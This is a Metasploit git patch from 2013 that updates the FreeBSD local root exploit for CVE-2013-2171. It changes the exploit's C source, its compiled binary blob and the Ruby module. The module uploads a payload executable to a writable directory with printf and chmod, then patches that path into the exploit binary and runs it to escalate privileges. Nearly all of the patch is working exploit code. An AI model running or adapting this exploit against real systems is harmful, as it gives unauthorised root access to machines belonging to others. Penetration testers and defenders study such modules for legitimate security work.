From b32513b1b826bc0d0b37ecc65fd16fe992885f46 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 25 Jun 2013 10:40:55 -0500
Subject: [PATCH] Fix CVE-2013-2171 with @jlee-r7 feedback

---
 data/exploits/CVE-2013-2171.bin               | Bin 6193 -> 6231 bytes
 .../source/exploits/CVE-2013-2171/exploit.c   |   2 +-
 modules/exploits/freebsd/local/mmap.rb        |  30 ++++++++++++------
 3 files changed, 21 insertions(+), 11 deletions(-)

diff --git a/data/exploits/CVE-2013-2171.bin b/data/exploits/CVE-2013-2171.bin
index 24177a25817dad0e85c5b3e319abb395a88f7863..8ed0677c17fc4a001cbafec3752e0df1df8472e1 100755
GIT binary patch
delta 1481
zcmZ8hQD_`h6uoa}rkPE*$;@sVEjDgKTq9K3q;_qzD6y$^qp6K;Y7>cAObQc;8ru!_
zqq>DnOG6Ykz6GNM-OxoAL{Ju`e?|pM@h8cT6tVP2XlR1us}&0CIg<%iAIzS2?s@Os
zGk5OWZ`*%s&o`^ZnU>+ELRf^4B^Zu~0{F2{O}j8Ne_yx^u?$k4`EhSJ4U(QR?Q}({
zxKah(5<09(`rS}ml`AtLLk*66X4*A4#3P18#)yW<I1x!Q#2S$^L|f!65vQIb){0CL
zBO(`xbs`@U>qYW<&1lLFfmIVH@JqYZ1haXZuH2|%B$(BswzBARX7}(`va;ZFy72BN
z|HkKZ<292PeNI>2BjkCX)1B8&evW*9f;PQQ2FCpbwCi<|pYS<tduj4MpVPkAN8aW0
zy#Ceftt%n=L2BAKzmQ2@D(Hk2cM1sAfA8cL)a3HS>gBTTxB3qh5tK~i*3R65d1(%$
zx;#&qcFr$P-1^0$uCD%^KQ{GeZq=SI;WOdL=w;*+Ou|>phe~?Y>QE8=;FdR4sxq}@
zTgXn~142pZ&+Vt20`}zYR5Q_z->Zw$xxBt<xAbEBp`!<%-QRuSxr5KAdtP|4_s~m+
z`(8eBwEx&E#|H*qZSUCq_@2}gdpn<Om*m9hQ_0hBjJ}=BjJ|bpWEgwZ1I9iUoxL=x
zJHl;hL=T4FQv-S_Jgmw(RoiVAkykI(CM#dnHd*Q!?bgNI3&9?=%|@5$wfffZ5bO@2
zLpr%eKk7s*dM@avo!0OiW^>SNUpotpH7MzioL0+kTKyen11Qsg{sZe-<pR1a;;-N7
zM*I>M^<!?ERYd%_UUFl4%yral{l424vZMM-_hGBEQ6vuOc9zW#cVY;76NBc6hM-3=
zXpLy_E@99h(GZs)v_~`~O7L$M(U2HHXq9M413_q*XvlU#NQ$~A_Ik@^8ih2w5#LOs
zkfsZ~q_4)}uHPPDN*d)9SLwfF$&T5;0{4E5D8B>%t6cd4m=9h_;g!AyFX_RCUD<1x
zZJJY|2Kft|6$Xe3#pDhr7<=&W)x!ArHzrMchtIc)!)6Eu^?1NnF(*&nqc?+h-@~D2
z<p=_-h6&L{HC_Y1dvU`+R3b7QY}f^z2WI|zfaC(sKRW84fX@cibwk^w6zKDTUIF*-
zAGjmg_394@@ZxS5Xp}3#2I&5Q*TBocfsU+KuLt_RKwk@ZcfjxdZ~r#5{l5v<s|~yc
f7fkynVAPbYvO`;q*K1Cm86SIRG*h|R*rWad)7(qy

delta 1422
zcmZ9MPiS049LIn2{<LqCn7+5WO%%H(p;^;XWH&X|)q04whYE#8NYP@!)>L?vM4sse
zBW&H3eJu^SBn}=F)ULfM7#2zo3TZ`)dMWV`L@7Ne7?K=vsEP>d_xm!@>cHFY@ALb;
znfcDVnO!a}6z6)?C-Z${xhN&V#}zbRL_w0=dyW^)H@Z_XiZLLbzy5ftAJ9MJc>PVK
zdX$QEpLI;t^y^lSiktJ6txgQT?|9oW$YH7_a)fG&9HnBC5$bl4QK~2M0u`g4q_&Bi
zqIQU!p>~Rd)Ey$@dfm=dOQ2T%Dg4rIE6>?NhAVekXnD>WvbJ(7Va^_6RkE^}FkOWA
zlRrzCZo*#j<%H=f+(VvAnC`+Nxki2_Pn%(hi70u2cEe%vsf1}eJVG8xnD)aF@^HfA
z`a9=nXARl69-Fl<ES3vbBAs`8{0ONXSN-~;ikGI=uEl!P9X(t@Qpz2xyXuS1m1#h0
zsX>|bFDy;1e(kcZzWH+Q_{=Z$HLp>_XTp%_YnV?Eq;5L>HNEBzs+4|c+p8+moY{7t
z<z?^zQOW2Jy(j$$ed>R-%IU!$TeoKG<N8;xZ%?5-5fz><7DuHpb#Ah7?&Y(u70PEP
zUO6)+>OuP;H<ah(bA3EDpf2h2sW;S+zMC3Tu|CmuNL892v>kKvyJ*8SzRq?L4`ZB+
z&4Z)^f45tLqmq6C5$#0!G@@xl(}=qDWxvDa(rS7E`Q$9>9}o>;^+Q?(=!GcKdl7L*
zD*Cx#Kvndc`2Aitf&uI2Kz|!N>}I<}a{6xYdzEJx4#XB5F*F*W+Jd8oMjKR{R|1V@
zsI~+Yp&hC%X-aZIsJ3J%LTgl8vJ{~~sx3PymQ?ga=B2)^X%wc}kNnm&3eyaOYkED?
z6C__5q@+tG`IgRQ3xj22fqmaWw(<`L@)3C4EJ<NWpMq=pe0E=T8PS$GWo2a@%pHY@
zvNG};1GFJLTpF+Po!IdnNVr`(w?3q)=M1kIe&n8dFLF=c!x*nBBS>&J925iW#*5&;
zE^Qh}ONX2`9rl?4C;vNuylt5OS2Xx8xNLSeuy)GFrrt311#ohWz`j&BT3;Z+`?qPJ
zOTIE4P)`P22FGSVUp87lnfgIfUp0Kl@Sp$d-;SgG?}QtzG>`g4$GZVdJJK%QdT-Zl
QcmIJ$50sjn-OsAO0c<ubLjV8(

diff --git a/external/source/exploits/CVE-2013-2171/exploit.c b/external/source/exploits/CVE-2013-2171/exploit.c
index b4c027a39b..0ee635d5d9 100644
--- a/external/source/exploits/CVE-2013-2171/exploit.c
+++ b/external/source/exploits/CVE-2013-2171/exploit.c
@@ -17,7 +17,7 @@ int main(int ac, char **av) {
    struct ptrace_io_desc piod;
    char *s, *d;
    int pid;
-   char *bin = "/tmp/W00T";  // "W00T" is just a place holder
+   char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890";  // is just a place holder
 
    if (geteuid() == 0)  {
         setuid(0);
diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb
index 095254b56f..d0c2858a36 100644
--- a/modules/exploits/freebsd/local/mmap.rb
+++ b/modules/exploits/freebsd/local/mmap.rb
@@ -12,6 +12,7 @@ class Metasploit4 < Msf::Exploit::Local
 
 	include Msf::Exploit::EXE
 	include Msf::Post::Common
+	include Msf::Post::File
 	include Msf::Exploit::FileDropper
 
 	def initialize(info={})
@@ -49,6 +50,11 @@ class Metasploit4 < Msf::Exploit::Local
 				'DisclosureDate' => "Jun 18 2013",
 			}
 		))
+		register_options([
+			# It isn't OptPath becuase it's a *remote* path
+			OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+		], self.class)
+
 	end
 
 	def check
@@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
 		Exploit::CheckCode::Safe
 	end
 
-	def write_file(data, fname)
+	def write_file(fname, data)
 		oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
 		session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
 		session.shell_command_token("chmod +x #{fname}")
@@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local
 		return (chk =~ /ERROR: cannot open/) ? false : true
 	end
 
+
 	def upload_payload
-		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
+		fname = datastore['WritableDir']
+		fname = "#{fname}/" unless fname =~ %r'/$'
+		if fname.length > 36
+			fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
+		end
+		fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
+
 		p = generate_payload_exe
-		f = write_file(p, fname)
+		f = write_file(fname, p)
 		return nil if not f
 		fname
 	end
@@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local
 		# Metasm does not support FreeBSD executable generation.
 		#
 		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
-		f    = File.open(path, 'rb')
-		x    = f.read(f.stat.size)
-		f.close
-
-		x.gsub(/W00T/, File.basename(payload_fname))
+		x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
+		x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
 	end
 
 	def upload_exploit(payload_fname)
-		fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
 		bin = generate_exploit(payload_fname)
-		f = write_file(bin, fname)
+		f = write_file(fname, bin)
 		return nil if not f
 		fname
 	end